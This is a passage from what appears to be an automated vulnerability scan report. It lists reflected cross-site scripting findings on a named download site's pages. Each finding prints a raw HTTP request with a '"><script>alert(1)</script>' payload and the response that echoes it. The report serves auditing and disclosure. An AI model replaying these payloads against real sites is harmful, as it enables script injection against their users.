<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.htmlfeff5"><script>alert(1)</script>b66c185e6a5" />
...[SNIP]...

1.31. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613af"><script>alert(1)</script>6093e6a1fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html?613af"><script>alert(1)</script>6093e6a1fe2=1" />
...[SNIP]...

1.32. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab62"><script>alert(1)</script>4dead600d30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30" />
...[SNIP]...

1.33. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2d1"><script>alert(1)</script>9e67a9dcdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1" />
...[SNIP]...

1.34. http://www.x64bitdownload.com/64-bit-feed-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4260b"><script>alert(1)</script>fce09807565 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565" />
...[SNIP]...

1.35. http://www.x64bitdownload.com/64-bit-feed-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ec"><script>alert(1)</script>6e593dfd62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1" />
...[SNIP]...

1.36. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c51"><script>alert(1)</script>c2a577b8281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281" />
...[SNIP]...

1.37. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d83d"><script>alert(1)</script>0d95b09fc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1" />
...[SNIP]...

1.38. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82621"><script>alert(1)</script>c53057f24a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1" />
...[SNIP]...

1.39. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4af"><script>alert(1)</script>ad7bd7c1eb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9" />
...[SNIP]...

1.40. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 817d3"><script>alert(1)</script>83b84f29eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1" />
...[SNIP]...

1.41. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c23"><script>alert(1)</script>323d5f8b558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558" />
...[SNIP]...

1.42. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63229"><script>alert(1)</script>158ae792632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1" />
...[SNIP]...

1.43. http://www.x64bitdownload.com/64-bit-forum-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dd1"><script>alert(1)</script>b828f5462c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1" />
...[SNIP]...

1.44. http://www.x64bitdownload.com/64-bit-forums-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a7c"><script>alert(1)</script>2d7fe0d2eb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0" />
...[SNIP]...

1.45. http://www.x64bitdownload.com/64-bit-forums-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaef"><script>alert(1)</script>f7180ec1d07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:37 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
